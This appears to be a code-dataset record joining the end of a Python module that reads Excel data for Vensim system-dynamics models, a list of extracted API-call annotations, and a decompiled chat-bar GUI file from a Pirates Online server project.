if data.shape[1] == 1:
# remove second dimension of data if its shape is (N, 1)
data = data[:, 0]
return series, data
def _resolve_file(self, root=None, possible_ext=None):
possible_ext = possible_ext or\
['', '.xls', '.xlsx', '.odt', '.txt', '.tab']
if self.file[0] == '?':
self.file = os.path.join(root, self.file[1:])
if not os.path.isfile(self.file):
for ext in possible_ext:
if os.path.isfile(self.file + ext):
self.file = self.file + ext
return
# raise FileNotFoundError(self.file)
# python2 compatibility
raise IOError("File Not Found: " + self.file)
else:
return
def _initialize_data(self, element_type):
"""
Initialize one element of DATA or LOOKUPS
Parameters
----------
element_type: str
"lookup" for LOOKUPS, "data" for data.
Returns
-------
data: xarray.DataArray
Dataarray with the time or interpolation dimension
as first dimension.
"""
self._resolve_file(root=self.root)
series_across = self._series_selector(self.x_row_or_col, self.cell)
size = utils.compute_shape(self.coords, reshape_len=1,
py_name=self.py_name)[0]
series, data = self._get_series_data(
series_across=series_across,
series_row_or_col=self.x_row_or_col,
cell=self.cell, size=size
)
# remove nan or missing values from dimension
if series_across != "name":
# Remove last nans only if the method is to read by row or col
i = 0
try:
while np.isnan(series[i-1]):
i -= 1
except IndexError:
# series has len 0
raise ValueError(
self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " has length 0"
)
if i != 0:
series = series[:i]
data = data[:i]
# warning/error if missing data in the series
if any(np.isnan(series)) and self.missing != "keep":
valid_values = ~np.isnan(series)
series = series[valid_values]
data = data[valid_values]
if self.missing == "warning":
warnings.warn(
self.py_name + "\n"
+ "Dimension value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " the corresponding data value(s) to the "
+ "missing/non-valid value(s) will be ignored\n\n"
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Dimension value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
)
# Check if the lookup/time dimension is strictly monotonous
if np.any(np.diff(series) <= 0) and self.missing != "keep":
raise ValueError(self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " is not strictly monotonous")
# Check for missing values in data
if np.any(np.isnan(data)) and self.missing != "keep":
if series_across == "name":
cell_type = "Cellrange"
else:
cell_type = "Reference cell"
if self.missing == "warning":
# Fill missing values with the chosen interpolation method
# what Vensim does during running for DATA
warnings.warn(
self.py_name + "\n"
+ "Data value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
+ " the corresponding value will be filled "
+ "with the interpolation method of the object.\n\n"
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Data value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
# fill values
self._fill_missing(series, data)
reshape_dims = tuple([len(series)] + utils.compute_shape(self.coords))
if len(reshape_dims) > 1:
data = self._reshape(data, reshape_dims)
if element_type == "lookup":
dim_name = "lookup_dim"
else:
dim_name = "time"
data = xr.DataArray(
data=data,
coords={dim_name: series, **self.coords},
dims=[dim_name] + list(self.coords)
)
return data
def _fill_missing(self, series, data):
"""
Fills missing values in excel read data. Mutates the values in data.
Parameters
----------
series:
the time series without missing values
data:
the data with missing values
Returns
-------
None
"""
# if data is 2dims we need to interpolate
datanan = np.isnan(data)
if len(data.shape) == 1:
data[datanan] = self._interpolate_missing(
series[datanan],
series[~datanan],
data[~datanan])
else:
for i, nanlist in enumerate(list(datanan.transpose())):
data[nanlist, i] = self._interpolate_missing(
series[nanlist],
series[~nanlist],
data[~nanlist][:, i])
def _interpolate_missing(self, x, xr, yr):
"""
Interpolates a list of missing values from _fill_missing
Parameters
----------
x:
list of missing values interpolate
xr:
non-missing x values
yr:
non-missing y values
Returns
-------
y:
Result after interpolating x with self.interp method
"""
y = np.empty_like(x, dtype=float)
for i, value in enumerate(x):
if self.interp == "raw":
y[i] = np.nan
elif value >= xr[-1]:
y[i] = yr[-1]
elif value <= xr[0]:
y[i] = yr[0]
elif self.interp == 'look forward':
y[i] = yr[xr >= value][0]
elif self.interp == 'hold backward':
y[i] = yr[xr <= value][-1]
else:
y[i] = np.interp(value, xr, yr)
return y
@property
def _file_sheet(self):
"""
Returns file and sheet name in a string
"""
return "\tFile name:\t{}\n".format(self.file)\
+ "\tSheet name:\t{}\n".format(self.sheet)
@staticmethod
def _col_to_num(col):
"""
Transforms the column name to int
Parameters
----------
col: str
Column name
Returns
-------
int
Column number
"""
if len(col) == 1:
return ord(col.upper()) - ord('A')
elif len(col) == 2:
left = ord(col[0].upper()) - ord('A') + 1
right = ord(col[1].upper()) - ord('A')
return left * (ord('Z')-ord('A')+1) + right
else:
left = ord(col[0].upper()) - ord('A') + 1
center = ord(col[1].upper()) - ord('A') + 1
right = ord(col[2].upper()) - ord('A')
return left * ((ord('Z')-ord('A')+1)**2)\
+ center * (ord('Z')-ord('A')+1)\
+ right
def _split_excel_cell(self, cell):
"""
Splits a cell value given in a string.
Returns None for non-valid cell formats.
Parameters
----------
cell: str
Cell like string, such as "A1", "b16", "AC19"...
If it is not a cell like string will return None.
Returns
-------
row number, column number: int, int
If the cell input is valid. Both numbers are given in Python
enumeration, i.e., first row and first column are 0.
"""
split = re.findall(r'\d+|\D+', cell)
try:
# check that we only have two values [column, row]
assert len(split) == 2
# check that the column name has no special characters
assert not re.compile('[^a-zA-Z]+').search(split[0])
# check that row number is not 0
assert int(split[1]) != 0
# the column name has as maximum 3 letters
assert len(split[0]) <= 3
return int(split[1])-1, self._col_to_num(split[0])
except AssertionError:
return
@staticmethod
def _reshape(data, dims):
"""
Reshapes an pandas.DataFrame, pandas.Series, xarray.DataArray
or np.ndarray in the given dimensions.
Parameters
----------
data: xarray.DataArray/numpy.ndarray
Data to be reshaped
dims: tuple
The dimensions to reshape.
Returns
-------
numpy.ndarray
reshaped array
"""
try:
data = data.values
except AttributeError:
pass
return data.reshape(dims)
def _series_selector(self, x_row_or_col, cell):
"""
Selects if a series data (DATA/LOOKUPS), should be read by columns,
rows or cellrange name.
Based on the input format of x_row_or_col and cell.
The format of the 2 variables must be consistent.
Parameters
----------
x_row_or_col: str
String of a number if series is given in a row, letter if series is
given in a column or name if the series is given by cellrange name.
cell: str
Cell identificator, such as "A1", or name if the data is given
by cellrange name.
Returns
-------
series_across: str
"row" if series is given in a row
"column" if series is given in a column
"name" if series and data are given by range name
"""
try:
# if x_row_or_col is numeric the series must be a row
int(x_row_or_col)
return "row"
except ValueError:
if self._split_excel_cell(cell):
# if the cell can be splitted means that the format is
# "A1" like then the series must be a column
return "column"
else:
return "name"
class ExtData(External):
"""
Class for Vensim GET XLS DATA/GET DIRECT DATA
"""
def __init__(self, file_name, sheet, time_row_or_col, cell,
interp, coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.time_row_or_cols = [time_row_or_col]
self.cells = [cell]
self.coordss = [coords]
self.root = root
self.interp = interp
# check if the interpolation method is valid
if not interp:
self.interp = "interpolate"
if self.interp not in ["interpolate", "raw",
"look forward", "hold backward"]:
raise ValueError(self.py_name + "\n"
+ " The interpolation method (interp) must be "
+ "'raw', 'interpolate', "
+ "'look forward' or 'hold backward")
def add(self, file_name, sheet, time_row_or_col, cell,
interp, coords):
"""
Add information to retrieve new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.time_row_or_cols.append(time_row_or_col)
self.cells.append(cell)
self.coordss.append(coords)
if not interp:
interp = "interpolate"
if interp != self.interp:
raise ValueError(self.py_name + "\n"
+ "Error matching interpolation method with "
+ "previously defined one")
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.time_row_or_cols,
self.cells, self.coordss)
for (self.file, self.sheet, self.x_row_or_col,
self.cell, self.coords) in zipped:
data.append(self._initialize_data("data"))
self.data = utils.xrmerge(data)
def __call__(self, time):
if time in self.data['time'].values:
outdata = self.data.sel(time=time)
elif self.interp == "raw":
return np.nan
elif time > self.data['time'].values[-1]:
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the time")
outdata = self.data[-1]
elif time < self.data['time'].values[0]:
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the time")
outdata = self.data[0]
elif self.interp == "interpolate":
outdata = self.data.interp(time=time)
elif self.interp == 'look forward':
outdata = self.data.sel(time=time, method="backfill")
elif self.interp == 'hold backward':
outdata = self.data.sel(time=time, method="pad")
if self.coordss[0]:
# Remove time coord from the DataArray
return outdata.reset_coords('time', drop=True)
else:
# if data has no-coords return a float
return float(outdata)
class ExtLookup(External):
"""
Class for Vensim GET XLS LOOKUPS/GET DIRECT LOOKUPS
"""
def __init__(self, file_name, sheet, x_row_or_col, cell,
coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.x_row_or_cols = [x_row_or_col]
self.cells = [cell]
self.root = root
self.coordss = [coords]
self.interp = "interpolate"
def add(self, file_name, sheet, x_row_or_col, cell, coords):
"""
Add information to retrieve new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.x_row_or_cols.append(x_row_or_col)
self.cells.append(cell)
self.coordss.append(coords)
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.x_row_or_cols,
self.cells, self.coordss)
for (self.file, self.sheet, self.x_row_or_col,
self.cell, self.coords) in zipped:
data.append(self._initialize_data("lookup"))
self.data = utils.xrmerge(data)
def __call__(self, x):
return self._call(self.data, x)
def _call(self, data, x):
if isinstance(x, xr.DataArray):
if not x.dims:
# shape 0 xarrays
return self._call(data, float(x))
if np.all(x > data['lookup_dim'].values[-1]):
outdata, _ = xr.broadcast(data[-1], x)
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the series")
elif np.all(x < data['lookup_dim'].values[0]):
outdata, _ = xr.broadcast(data[0], x)
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the series")
else:
data, _ = xr.broadcast(data, x)
outdata = data[0].copy()
for a in utils.xrsplit(x):
outdata.loc[a.coords] = self._call(data.loc[a.coords],
float(a))
# the output will be always an xarray
return outdata.reset_coords('lookup_dim', drop=True)
else:
if x in data['lookup_dim'].values:
outdata = data.sel(lookup_dim=x)
elif x > data['lookup_dim'].values[-1]:
outdata = data[-1]
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the series")
elif x < data['lookup_dim'].values[0]:
outdata = data[0]
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the series")
else:
outdata = data.interp(lookup_dim=x)
# the output could be a float or an xarray
if self.coordss[0]:
# Remove lookup dimension coord from the DataArray
return outdata.reset_coords('lookup_dim', drop=True)
else:
# if lookup has no-coords return a float
return float(outdata)
class ExtConstant(External):
"""
Class for Vensim GET XLS CONSTANTS/GET DIRECT CONSTANTS
"""
def __init__(self, file_name, sheet, cell, coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.transposes = [cell[-1] == '*']
self.cells = [cell.strip('*')]
self.root = root
self.coordss = [coords]
def add(self, file_name, sheet, cell, coords):
"""
Add information to retrieve new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.transposes.append(cell[-1] == '*')
self.cells.append(cell.strip('*'))
self.coordss.append(coords)
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.transposes,
self.cells, self.coordss)
for (self.file, self.sheet, self.transpose,
self.cell, self.coords) in zipped:
data.append(self._initialize())
self.data = utils.xrmerge(data)
def _initialize(self):
"""
Initialize one element
"""
self._resolve_file(root=self.root)
split = self._split_excel_cell(self.cell)
if split:
data_across = "cell"
cell = split
else:
data_across = "name"
cell = self.cell
shape = utils.compute_shape(self.coords, reshape_len=2,
py_name=self.py_name)
if self.transpose:
shape.reverse()
data = self._get_constant_data(data_across, cell, shape)
if self.transpose:
data = data.transpose()
if np.any(np.isnan(data)):
# nan values in data
if data_across == "name":
cell_type = "Cellrange"
else:
cell_type = "Reference cell"
if self.missing == "warning":
warnings.warn(
self.py_name + "\n"
+ "Constant value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Constant value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
# Create only an xarray if the data is not 0 dimensional
if len(self.coords) > 0:
reshape_dims = tuple(utils.compute_shape(self.coords))
if len(reshape_dims) > 1:
data = self._reshape(data, reshape_dims)
data = xr.DataArray(
data=data, coords=self.coords, dims=list(self.coords)
)
return data
def _get_constant_data(self, data_across, cell, shape):
"""
Function thar reads data from excel file for CONSTANT
Parameters
----------
data_across: "cell" or "name"
The way to read data file.
cell: int or str
If data_across is "cell" the lefttop split cell value where
the data is.
If data_across is "name" the cell range name where the data is.
shape:
The shape of the data in 2D.
Returns
-------
data: float/ndarray(1D/2D)
The values of the data.
"""
if data_across == "cell":
# read data from topleft cell name using pandas
start_row, start_col = cell
return self._get_data_from_file(
rows=[start_row, start_row + shape[0]],
cols=[start_col, start_col + shape[1]])
else:
# read data from cell range name using OpenPyXL
data = self._get_data_from_file_opyxl(cell)
try:
# Remove length=1 axis
data_shape = data.shape
if data_shape[1] == 1:
data = data[:, 0]
if data_shape[0] == 1:
data = data[0]
except AttributeError:
# Data is a float, nothing to do
pass
# Check data dims
try:
if shape[0] == 1 and shape[1] != 1:
assert shape[1] == len(data)
elif shape[0] != 1 and shape[1] == 1:
assert shape[0] == len(data)
elif shape[0] == 1 and shape[1] == 1:
assert isinstance(data, float)
else:
assert tuple(shape) == data.shape
except AssertionError:
raise ValueError(self.py_name + "\n"
+ "Data given in:\n"
+ self._file_sheet
+ "\tData name:\t{}\n".format(cell)
+ " has not the same shape as the"
+ " given coordinates")
return data
def __call__(self):
return self.data
class ExtSubscript(External):
"""
Class for Vensim GET XLS SUBSCRIPT/GET DIRECT SUBSCRIPT
"""
def __init__(self, file_name, sheet, firstcell, lastcell, prefix, root):
super().__init__("Hardcoded external subscript")
self.file = file_name
self.sheet = sheet
self._resolve_file(root=root)
row_first, col_first = self._split_excel_cell(firstcell)
row_last, col_last = self._split_excel_cell(lastcell)
data = pd.read_excel(
self.file, sheet,
skiprows=row_first-1,
nrows=row_last-row_first+1,
usecols=np.arange(col_first, col_last+1)
)
self.subscript = [prefix + str(d) for d in data.values.flatten()]
| [((16001, 16015), 'numpy.isnan', 'np.isnan', (['data'], {}), '(data)\n', (16009, 16015), True, 'import numpy as np\n'), ((16902, 16931), 'numpy.empty_like', 'np.empty_like', (['x'], {'dtype': 'float'}), '(x, dtype=float)\n', (16915, 16931), True, 'import numpy as np\n'), ((19042, 19071), 're.findall', 're.findall', (['"""\\\\d+|\\\\D+"""', 'cell'], {}), "('\\\\d+|\\\\D+', cell)\n", (19052, 19071), False, 'import re\n'), ((1349, 1405), 'openpyxl.load_workbook', 'load_workbook', (['file_name'], {'read_only': '(True)', 'data_only': '(True)'}), '(file_name, read_only=True, data_only=True)\n', (1362, 1405), False, 'from openpyxl import load_workbook\n'), ((10559, 10592), 'os.path.join', 'os.path.join', (['root', 'self.file[1:]'], {}), '(root, self.file[1:])\n', (10571, 10592), False, 'import os\n'), ((10609, 10634), 'os.path.isfile', 'os.path.isfile', (['self.file'], {}), '(self.file)\n', (10623, 10634), False, 'import os\n'), ((26592, 26633), 'numpy.all', 'np.all', (["(x > data['lookup_dim'].values[-1])"], {}), "(x > data['lookup_dim'].values[-1])\n", (26598, 26633), True, 'import numpy as np\n'), ((30529, 30543), 'numpy.isnan', 'np.isnan', (['data'], {}), '(data)\n', (30537, 30543), True, 'import numpy as np\n'), ((10692, 10723), 'os.path.isfile', 'os.path.isfile', (['(self.file + ext)'], {}), '(self.file + ext)\n', (10706, 10723), False, 'import os\n'), ((12025, 12048), 'numpy.isnan', 'np.isnan', (['series[i - 1]'], {}), '(series[i - 1])\n', (12033, 12048), True, 'import numpy as np\n'), ((12600, 12616), 'numpy.isnan', 'np.isnan', (['series'], {}), '(series)\n', (12608, 12616), True, 'import numpy as np\n'), ((12674, 12690), 'numpy.isnan', 'np.isnan', (['series'], {}), '(series)\n', (12682, 12690), True, 'import numpy as np\n'), ((13977, 13991), 'numpy.isnan', 'np.isnan', (['data'], {}), '(data)\n', (13985, 13991), True, 'import numpy as np\n'), ((26664, 26689), 'xarray.broadcast', 'xr.broadcast', (['data[-1]', 'x'], {}), '(data[-1], x)\n', (26676, 26689), True, 'import xarray as xr\n'), ((26706, 26805), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' +\n 'extrapolating data above the maximum value of the series')"], {}), "(self.py_name + '\\n' +\n 'extrapolating data above the maximum value of the series')\n", (26719, 26805), False, 'import warnings\n'), ((26856, 26896), 'numpy.all', 'np.all', (["(x < data['lookup_dim'].values[0])"], {}), "(x < data['lookup_dim'].values[0])\n", (26862, 26896), True, 'import numpy as np\n'), ((34649, 34683), 'numpy.arange', 'np.arange', (['col_first', '(col_last + 1)'], {}), '(col_first, col_last + 1)\n', (34658, 34683), True, 'import numpy as np\n'), ((835, 869), 'pandas.to_numeric', 'pd.to_numeric', (['ex'], {'errors': '"""coerce"""'}), "(ex, errors='coerce')\n", (848, 869), True, 'import pandas as pd\n'), ((3158, 3185), 'os.path.splitext', 'os.path.splitext', (['self.file'], {}), '(self.file)\n', (3174, 3185), False, 'import os\n'), ((8183, 8203), 'numpy.array', 'np.array', (['[[series]]'], {}), '([[series]])\n', (8191, 8203), True, 'import numpy as np\n'), ((9144, 9162), 'numpy.array', 'np.array', (['[[data]]'], {}), '([[data]])\n', (9152, 9162), True, 'import numpy as np\n'), ((13609, 13624), 'numpy.diff', 'np.diff', (['series'], {}), '(series)\n', (13616, 13624), True, 'import numpy as np\n'), ((23945, 24042), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' + 'extrapolating data above the maximum value of the time'\n )"], {}), "(self.py_name + '\\n' +\n 'extrapolating data above the maximum value of the time')\n", (23958, 24042), False, 'import warnings\n'), ((26927, 26951), 'xarray.broadcast', 'xr.broadcast', (['data[0]', 'x'], {}), '(data[0], x)\n', (26939, 26951), True, 'import xarray as xr\n'), ((26968, 27067), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' +\n 'extrapolating data below the minimum value of the series')"], {}), "(self.py_name + '\\n' +\n 'extrapolating data below the minimum value of the series')\n", (26981, 27067), False, 'import warnings\n'), ((27145, 27166), 'xarray.broadcast', 'xr.broadcast', (['data', 'x'], {}), '(data, x)\n', (27157, 27166), True, 'import xarray as xr\n'), ((27713, 27812), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' +\n 'extrapolating data above the maximum value of the series')"], {}), "(self.py_name + '\\n' +\n 'extrapolating data above the maximum value of the series')\n", (27726, 27812), False, 'import warnings\n'), ((19272, 19296), 're.compile', 're.compile', (['"""[^a-zA-Z]+"""'], {}), "('[^a-zA-Z]+')\n", (19282, 19296), False, 'import re\n'), ((24165, 24262), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' + 'extrapolating data below the minimum value of the time'\n )"], {}), "(self.py_name + '\\n' +\n 'extrapolating data below the minimum value of the time')\n", (24178, 24262), False, 'import warnings\n'), ((27947, 28046), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' +\n 'extrapolating data below the minimum value of the series')"], {}), "(self.py_name + '\\n' +\n 'extrapolating data below the minimum value of the series')\n", (27960, 28046), False, 'import warnings\n'), ((912, 961), 'pandas.read_excel', 'pd.read_excel', (['file_name', 'sheet_name'], {'header': 'None'}), '(file_name, sheet_name, header=None)\n', (925, 961), True, 'import pandas as pd\n'), ((17386, 17410), 'numpy.interp', 'np.interp', (['value', 'xr', 'yr'], {}), '(value, xr, yr)\n', (17395, 17410), True, 'import numpy as np\n')] |
ksmit799/POTCO-PS | pirates/piratesgui/ChatBar.py | 520d38935ae8df4b452c733a82c94dddac01e275 | # File: C (Python 2.4)
from direct.gui.DirectGui import *
from direct.interval.IntervalGlobal import *
from direct.fsm.FSM import FSM
from direct.showbase.PythonUtil import Functor
from pandac.PandaModules import *
from pirates.piratesbase import PiratesGlobals
from pirates.piratesbase import PLocalizer
from pirates.piratesgui import PiratesGuiGlobals
from pirates.piratesgui.TabBar import TopTab, TabBar
class ChatTab(TopTab):
def __init__(self, tabBar, name, text_xyz = None, **kw):
optiondefs = (('modelName', 'general_frame_c', None), ('frameSize', (0, 0.22, 0.0, 0.10000000000000001), None), ('borderScale', 0.13500000000000001, None), ('bgBuffer', 0.14000000000000001, None), ('label', '', None), ('textMayChange', 1, None))
self.defineoptions(kw, optiondefs)
TopTab.__init__(self, tabBar, name, **None)
self.initialiseoptions(ChatTab)
text_pos = (0.11700000000000001, 0.040000000000000001, 0)
if text_xyz:
text_pos = text_xyz
self.myTextScale = PiratesGuiGlobals.TextScaleLarge * 1.1000000000000001
self.myLabel = DirectLabel(parent = self, relief = None, state = DGG.DISABLED, text = self['label'], text_scale = self.myTextScale, text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = text_pos, text_font = PiratesGlobals.getInterfaceFont(), textMayChange = 1)
def destroy(self):
self.myLabel = None
TopTab.destroy(self)
def setBoxWidth(self, percentage):
iPercentage = 1.0 / percentage
self.myLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
class ChatTabBar(TabBar):
def refreshTabs(self):
for (x, name) in enumerate(self.tabOrder):
tab = self.tabs[name]
tab.setPos(0.070000000000000007 + 0.19500000000000001 * (x + self.offset), 0, 0.059999999999999998)
tab.reparentTo(self.bParent)
for name in reversed(self.tabOrder):
tab = self.tabs[name]
tab.reparentTo(self.bParent)
self.activeIndex = max(0, min(self.activeIndex, len(self.tabOrder) - 1))
if len(self.tabOrder):
name = self.tabOrder[self.activeIndex]
tab = self.tabs[name]
tab.reparentTo(self.fParent)
tab.setZ(0.076999999999999999)
def makeTab(self, name, **kw):
return ChatTab(self, name, **None)
def stash(self):
TabBar.stash(self)
def setBoxWidth(self, percentage):
for key in self.tabs:
self.tabs[key].setBoxWidth(percentage)
class WhisperTab(TopTab):
def __init__(self, tabBar, name, **kw):
optiondefs = (('modelName', 'general_frame_c', None), ('frameSize', (0, 0.745, 0.0, 0.11), None), ('borderScale', 0.13500000000000001, None), ('bgBuffer', 0.14000000000000001, None))
self.defineoptions(kw, optiondefs)
TopTab.__init__(self, tabBar, name, **None)
self.initialiseoptions(ChatTab)
class WhisperTabBar(TabBar):
def refreshTabs(self):
for (x, name) in enumerate(self.tabOrder):
tab = self.tabs[name]
tab.setPos(0.070000000000000007 + 0.71999999999999997 * (x + self.offset), 0, 0.059999999999999998)
tab.reparentTo(self.bParent)
for name in reversed(self.tabOrder):
tab = self.tabs[name]
tab.reparentTo(self.bParent)
self.activeIndex = max(0, min(self.activeIndex, len(self.tabOrder) - 1))
if len(self.tabOrder):
name = self.tabOrder[self.activeIndex]
tab = self.tabs[name]
tab.reparentTo(self.fParent)
tab.setZ(0.076999999999999999)
def makeTab(self, name, **kw):
newWhisperTab = WhisperTab(self, name, **None)
if hasattr(self, 'percentage'):
newWhisperTab.setBoxWidth(self.percentage)
return newWhisperTab
class ChatBar(DirectFrame, FSM):
def __init__(self, parent, chatMgr, whiteListEntry, *args, **kw):
optiondefs = (('relief', None, None), ('state', DGG.DISABLED, None), ('frameSize', (0, 1, 0, 0.75), None), ('frameColor', (1, 0, 1, 0.20000000000000001), None))
self.defineoptions(kw, optiondefs)
DirectFrame.__init__(self, parent, *args, **args)
self.initialiseoptions(ChatBar)
FSM.__init__(self, 'ChatBar')
if base.config.GetBool('whitelist-chat-enabled', 1):
pass
self.whiteListEnabled = base.cr.accountDetailRecord.WLChatEnabled
self.openChatEnabled = base.cr.accountDetailRecord.canOpenChatAndNotGetBooted()
if not self.whiteListEnabled:
pass
self.noChat = not (self.openChatEnabled)
self.chatTabs = None
self.whisperTabs = None
self.chatMgr = chatMgr
self.slideIval = None
self.whisperNameLabel = None
self.whisperPrefixLabel = None
self.percentage = 1.0
self.iPercentage = 1.0
self.myTextScale = PiratesGuiGlobals.TextScaleLarge * 1.1000000000000001
self.setupGui(whiteListEntry)
self.request('Hidden')
def destroy(self):
self.cleanup()
self.stopSlideIval()
DirectFrame.destroy(self)
self.cleanupGui()
self.chatMgr = None
def setBoxWidth(self, percentage):
iPercentage = 1.0 / percentage
self.setScale(percentage, 1.0, 1.0)
self.chatTabs.setBoxWidth(percentage)
self.speedButton.setScale(iPercentage, 1.0, 1.0)
self.emoteButton.setScale(iPercentage, 1.0, 1.0)
self.startChatButton.setScale(iPercentage, 1.0, 1.0)
self.percentage = percentage
self.iPercentage = iPercentage
if self.whisperNameLabel:
self.whisperNameLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
self.whisperNameLabel['text_pos'] = (0.20999999999999999 * self.iPercentage, 0.040000000000000001, 0)
if self.whisperPrefixLabel:
self.whisperPrefixLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
def setupGui(self, whiteListEntry):
self.stopSlideIval()
if self.chatTabs:
self.chatTabs.destroy()
if self.whisperTabs:
self.whisperTabs.destroy()
self.removeChildren()
gui = loader.loadModel('models/gui/chat_frame_b')
skullbg = loader.loadModel('models/gui/chat_frame_a')
skullbg2 = loader.loadModel('models/gui/chat_frame_a')
skullgui = loader.loadModel('models/gui/chat_frame_skull')
emoteGfxbg = loader.loadModel('models/gui/chat_frame_a')
icons = loader.loadModel('models/gui/toplevel_gui')
charGui = loader.loadModel('models/gui/char_gui')
scale = Vec3(0.20000000000000001, 1.0, 0.20000000000000001)
offset = (0.5, 0, 0.38)
speedChatBg = self.attachNewNode('speedChatBg')
skullbg.find('**/pPlane11').reparentTo(speedChatBg)
speedChatBg.setScale(scale)
speedChatBg.setPos(*offset)
speedChatBg.flattenStrong()
emoteBg = self.attachNewNode('emoteBg')
skullbg2.find('**/pPlane11').reparentTo(emoteBg)
emoteBg.setScale(scale)
emoteBg.setPos(0.59099999999999997, 0, 0.38)
emoteBg.flattenStrong()
self.chatEntryBackground = self.attachNewNode('chatEntryBackground')
self.chatEntryBackground.setX(-0.90000000000000002)
self.backTabParent = self.chatEntryBackground.attachNewNode('backTabs')
textEntryGeom = self.chatEntryBackground.attachNewNode('textEntryBg')
gui.find('**/pPlane12').reparentTo(textEntryGeom)
textEntryGeom.setScale(scale)
textEntryGeom.setPos(*offset)
textEntryGeom.flattenStrong()
self.chatEntryVisNode = textEntryGeom.attachNewNode('chatEntryVis')
self.chatEntryVisNode.hide()
self.chatEntryVisNode.setAlphaScale(0)
whiteListEntry.reparentTo(self.chatEntryVisNode)
if self.noChat:
def noshow():
pass
whiteListEntry.show = noshow
whiteListEntry.hide()
else:
whiteListEntry.setPos(0.20000000000000001, 0, 0.035999999999999997)
self.frontTabParent = self.chatEntryBackground.attachNewNode('frontTab', sort = 2)
self.speedButton = DirectButton(parent = self, relief = None, frameSize = (-0.055, 0.044999999999999998, -0.055, 0.044999999999999998), geom = (icons.find('**/chat_bubble_icon'), icons.find('**/chat_bubble_icon'), icons.find('**/chat_bubble_icon_over')), geom_scale = 0.25, pos = (0.14000000000000001, 0, 0.044999999999999998), rolloverSound = None, command = self.chatMgr.activateSpeedChat)
self.emoteButton = DirectButton(parent = self, relief = None, frameSize = (-0.055, 0.044999999999999998, -0.055, 0.044999999999999998), geom = (charGui.find('**/*head'), charGui.find('**/*head'), charGui.find('**/*head_over')), geom_scale = 0.29999999999999999, pos = (0.049000000000000002, 0, 0.044999999999999998), rolloverSound = None, command = self.chatMgr.activateEmoteChat)
tGui = loader.loadModel('models/gui/triangle')
triangle = (tGui.find('**/triangle'), tGui.find('**/triangle_down'), tGui.find('**/triangle_over'))
self.startChatButton = DirectButton(parent = self, relief = None, image = triangle, image_scale = 0.065000000000000002, pos = (0.23100000000000001, 0.0, 0.050000000000000003), rolloverSound = None, command = self.chatMgr.activateChat)
self.chatTabs = ChatTabBar(parent = self, backParent = self.backTabParent, frontParent = self.frontTabParent)
allTab = self.chatTabs.addTab('All', label = PLocalizer.ChatTabAll, command = self.chatMgr.activateChat, extraArgs = [
'All'])
crewTab = self.chatTabs.addTab('Crew', label = PLocalizer.ChatTabCrew, command = self.chatMgr.activateChat, extraArgs = [
'Crew'])
guildTab = self.chatTabs.addTab('Guild', label = PLocalizer.ChatTabGuild, command = self.chatMgr.activateChat, extraArgs = [
'Guild'])
shipPVPTab = self.chatTabs.addTab('ShipPVP', label = PLocalizer.ChatTabShipPVP, command = self.chatMgr.activateChat, frameSize = (0, 0.23999999999999999, 0.0, 0.10000000000000001), textMayChange = 1, extraArgs = [
'ShipPVP'])
self.chatTabs.stash()
self.whisperTabs = WhisperTabBar(parent = self, backParent = self.backTabParent, frontParent = self.frontTabParent)
whisperNameTab = self.whisperTabs.addTab('Name')
whisperCancelTab = self.whisperTabs.addTab('Cancel', command = self.whisperCanceled)
self.whisperTabs.stash()
